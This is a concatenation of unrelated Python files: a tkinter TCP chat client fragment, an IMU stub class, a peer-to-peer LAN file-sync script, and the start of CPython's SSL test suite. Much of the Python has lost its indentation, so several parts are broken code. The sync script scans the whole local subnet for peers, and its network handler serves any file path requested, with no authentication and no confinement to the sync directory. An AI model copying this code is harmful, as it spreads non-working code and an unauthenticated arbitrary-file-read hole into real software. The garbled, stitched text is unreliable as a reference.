            self.textEdit.insert(tk.INSERT,msg+'\n')
            # Scroll to the end so the latest message is visible
            self.textEdit.see(tk.END)
            # Make textEdit read-only again
            self.textEdit.config(state='disabled')
            self.inputText.delete('1.0',tk.END) # Clear the input box
            # Send the data to the server
            sendMessage=bytes(msg,encoding='utf8')
            # Unlike UDP, send() needs no address/port here because a TCP connection is already established
            clientSocket.send(sendMessage)
        else:
            tk.messagebox.showinfo('Warning',"Cannot send an empty message!")
    def getInfo(self):
        global clientSocket
        while True:
            # Receive data with recv(); 1024 is the buffer size
            recMessage=clientSocket.recv(1024).decode("utf8")+'\n'
            # Receive time and the received data
            recTime='Server '+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
            self.textEdit.config(state='normal')
            # The 'server' tag changes the font color
            self.textEdit.insert(tk.END,recTime,'server')
            self.textEdit.insert(tk.END,recMessage)
            # Scroll to the end so the latest message is visible
            self.textEdit.see(tk.END)
            self.textEdit.config(state='disabled')
def textSendReturn(self,event):
if event.keysym=="Return":
self.textSend()
# Server address and port
servername=''
serverport=12000
ipRootFrame=tk.Tk()
ipRootFrame.title('Enter server IP')
ipDialog=inputIPdialog(ipRootFrame)
ipDialog.mainloop()
# socket(): the first argument selects IPv4, the second makes this a TCP socket
clientSocket=None
try:
    clientSocket=socket(AF_INET,SOCK_STREAM)
    # A TCP connection must first be established with a handshake
    clientSocket.connect((servername,serverport))
except OSError:
    tk.messagebox.showinfo('Error','Check whether the server address is correct!')
    raise
root=tk.Tk()
root.title('SCP INNER CONNECTION KIT')
app=Application(master=root)
app.mainloop()
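# Note (illustrative, not part of the original script): this client expects a
# matching TCP chat server to be listening on port 12000 at the address
# entered in the dialog above.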
|
IMU.py
|
from threading import Thread
import time
class IMU:
def __init__(self):
print("you have created an IMU object")
self.angle = 0.0
def startListrening(self, frequency):
self.frequency = frequency
Thread(target=self.__updateIMU__, args=()).start()
def __updateIMU__(self):
while True:
print("updates IMU every cycle")
self.angle = 10.0
time.sleep(1/self.frequency)
def getAngle(self):
return self.angle
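# Illustrative usage sketch (comments only, not part of the original module):
# poll the stub IMU at 50 Hz and read back the latest angle. Note that
# __updateIMU__ loops forever in a non-daemon thread, so a real caller has to
# handle shutdown itself.
#
#   imu = IMU()
#   imu.startListrening(50)   # method name spelled as defined in the class above
#   time.sleep(0.1)
#   print(imu.getAngle())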
|
sync-node.py
|
# -*- coding: utf-8 -*-
import socket
import json
from pathlib import Path
from enum import Enum
from time import time
from threading import Thread
from subprocess import check_output
# PATH TO WORK
MYPATH = '.'
# Constants
INTERFACE = socket.AF_INET # interface type
TRANSPORT = socket.SOCK_STREAM # transport type: aka TCP
timesold = lambda path: path.stat().st_mtime
newest = lambda t1, t2: t1 if t1 > t2 else t2  # the larger mtime is the more recent one
class Status(Enum):
ADD_FILE = '1'
CHANGE = '2'
DELETE = '3'
ADD_PATH = '4'
class Command:
HELLO = b'1'
PUBLICATION = b'2'
GET = b'3'
size = 1
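# Wire format used below: every message starts with a one-byte Command. A
# PUBLICATION is followed by newline-terminated report lines of the form
# "<path> <mtime> <status value> <sender ip>" (see add_report in
# check_my_updates); a GET is followed by the requested path.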
DEBUG = True
def mdebug(*objects, sep=' ', end='\n'):
if DEBUG:
for o in objects:
print(o, end=sep)
print(end=end)
class SyncNode:
port_listen = 65432
external_reports = []
def __init__(self, directory):
self.directory = Path(directory) # root directory to sync
self.main_map = {} # TODO init loading from file
self.friends = [] # list of IPs
self.internal_reports = []
self.myip = None
self.search_friend()
self.thread_listen = Thread(target=SyncNode.listen_mode)
self.thread_listen.start()
def run(self):
self.check_external_updates()
self.check_my_updates()
self.publish_updates()
def check_external_updates(self):
        while SyncNode.external_reports:
            reports = SyncNode.external_reports.pop(0)
            for r in reports.split('\n'):
                if not r:
                    continue  # each report line ends with '\n', so skip the empty trailing entry
                path, t_old, status, friend_ip = r.split(' ')
                t_old = float(t_old)
                status = Status(status)
if status == Status.ADD_PATH:
if path in self.main_map:
if newest(t_old, self.main_map[path]) == t_old:
if not Path(path).is_dir():
                                raise Exception('Sync failure: a directory and a file share the same name, and the received directory is more recent.')
else:
Path(path).mkdir()
elif status == Status.ADD_FILE:
if path in self.main_map:
if newest(t_old, self.main_map[path]) == t_old:
if Path(path).is_dir():
                                raise Exception('Sync failure: a directory and a file share the same name, and the received file is more recent.')
else:
self.get_file_from_friend(path, friend_ip)
elif status == Status.CHANGE:
pass # TODO
elif status == Status.DELETE:
pass # TODO
else:
                    raise Exception('Unknown status.')
def check_my_updates(self):
current_map = self.directory_tree_status(self.directory)
reports = ''
        add_report = lambda path, t_old, status: '{} {} {} {}\n'.format(path, t_old, status.value, self.myip)  # serialize the enum's value so receivers can parse it back
# Compare path added or changed
for path in current_map:
if path not in self.main_map:
status = Status.ADD_PATH if Path(path).is_dir() else Status.ADD_FILE
reports += add_report(path, current_map[path], status)
elif current_map[path] > self.main_map[path]:
reports += add_report(path, current_map[path], Status.CHANGE)
# Compare path deleted
for path in self.main_map:
if path not in current_map:
reports += add_report(path, self.main_map[path], Status.DELETE)
self.internal_reports.append(reports)
return reports
def publish_updates(self):
while self.internal_reports:
report = self.internal_reports.pop(0)
for friend_ip in self.friends:
friend = socket.socket(INTERFACE, TRANSPORT)
try:
friend.connect((friend_ip, SyncNode.port_listen))
msg = Command.PUBLICATION + report.encode()
friend.sendall(msg)
                except Exception:
                    pass
                finally:
                    friend.close()  # closing lets the receiver's recv() loop see EOF
def get_file_from_friend(self, path, friend_ip):
friend = socket.socket(INTERFACE, TRANSPORT)
try:
friend.connect((friend_ip, SyncNode.port_listen))
msg = Command.GET + path.encode()
            friend.sendall(msg)
            friend.shutdown(socket.SHUT_WR)  # tell the peer the request is complete so its recv loop ends
            data = b''
            tmp = friend.recv(1024)
while tmp:
data += tmp
tmp = friend.recv(1024)
            # Ensure the target directory exists
            path_split = Path(path).as_posix().split('/')
            d = Path('/'.join(path_split[:-1]))
            if not d.exists():
                d.mkdir(parents=True)
with open(path, 'w') as f:
f.write(data.decode())
        except Exception:
            pass
        finally:
            friend.close()
    #@staticmethod
    def directory_tree_status(self, dirname, traversed=None, results=None):
        if traversed is None:
            traversed = []  # fresh containers per call; mutable defaults would leak state across runs
        if results is None:
            results = {}
        traversed.append(dirname)
        if dirname.is_dir():
for path in dirname.iterdir():
results[path.name] = timesold(path)
if path not in traversed:
self.directory_tree_status(path, traversed, results)
return results
def search_friend(self):
ip = check_output(['hostname', '--all-ip-addresses'])
self.myip = ip = ip.split()[0].decode()
mdebug('My ip:', ip)
ip_parts = ip.split('.')
base_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'
for i in range(1,255):
target_ip = base_ip + str(i)
if target_ip == ip or target_ip in self.friends:
continue
friend = socket.socket(INTERFACE, TRANSPORT)
try:
friend.connect((target_ip, SyncNode.port_listen))
friend.sendall(Command.HELLO)
response = friend.recv(1024)
mdebug(' Response:', response)
if response == Command.HELLO:
self.friends.append(target_ip)
mdebug('New friend:', target_ip)
except Exception as e:
pass
friend.close()
@staticmethod
def listen_mode():
mdebug('Init server')
s = socket.socket(INTERFACE, TRANSPORT)
s.bind(('', SyncNode.port_listen))
        s.listen(10) # number of queued connections
        while True:  # keep serving peers; the original code handled only the first connection
            conn, addr = s.accept()
            mdebug('Connected by', addr)
            while 1:
                data = conn.recv(Command.size)
                if not data: break
                if data == Command.HELLO:
                    conn.send(Command.HELLO)
                elif data == Command.PUBLICATION:
                    SyncNode.receiver_publication(conn)
                elif data == Command.GET:
                    path = b''
                    tmp = conn.recv(1024)
                    while tmp:
                        path += tmp
                        tmp = conn.recv(1024)
                    SyncNode.send_file_to_friend(conn, path.decode())
            conn.close()
@staticmethod
def receiver_publication(conn):
report = ''
tmp = conn.recv(1024)
while tmp:
            report += tmp.decode()
tmp = conn.recv(1024)
SyncNode.external_reports.append(report)
@staticmethod
def send_file_to_friend(conn, path):
file = Path(path)
if not file.exists():
            # raise Exception('Error: the requested file does not exist: ' + path)
            mdebug('Error: the requested file does not exist: ' + path)
        elif file.is_dir():
            mdebug('Error: the requested path is a directory, not a file: ' + path)
        else:
            with file.open('rb') as f:  # read bytes so sendall() gets bytes rather than str
                data = f.read()
            conn.sendall(data)
if __name__ == '__main__':
    # test: discover "friends" on the local network
    # The constructor already starts the listening thread and scans for peers,
    # so starting a second listen_mode thread here would try to bind the port twice.
    n2 = SyncNode(Path(MYPATH))
    n2.search_friend()
    n2.thread_listen.join()
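# Illustrative deployment note (an assumption, not part of the original
# script): run this script on two hosts in the same /24 network. search_friend()
# probes that address range for peers answering HELLO on port 65432, after
# which reports and files can be exchanged via run() and the listening thread.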
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
asyncore = warnings_helper.import_deprecated('asyncore')
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
        # Assume that any reference to "ubuntu" implies an Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
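# Illustrative usage of the decorator above (a sketch of how it is typically
# applied to a test method):
#
#   @requires_tls_version('TLSv1_3')
#   def test_something_that_needs_tls13(self):
#       ...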
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(repr(proto), '<_SSLMethod.PROTOCOL_TLS_CLIENT: %r>' % proto.value)
self.assertEqual(str(proto), str(proto.value))
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
if major >= 3:
# 3.x uses 0xMNN00PP0L
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{patch:d}"
else:
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'ssl.{protocol.name} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
version_text = '%s.%s' % (version.__class__.__name__, version.name)
self.assertEqual(
f'ssl.{version_text} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
